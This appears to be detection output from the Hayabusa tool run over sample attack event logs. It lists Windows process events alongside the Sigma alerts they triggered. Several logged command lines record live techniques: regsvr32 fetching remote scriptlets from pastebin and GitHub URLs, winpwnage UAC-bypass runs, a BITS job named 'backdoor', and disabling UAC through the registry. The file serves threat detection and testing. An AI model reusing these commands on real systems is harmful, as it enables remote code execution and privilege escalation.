2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
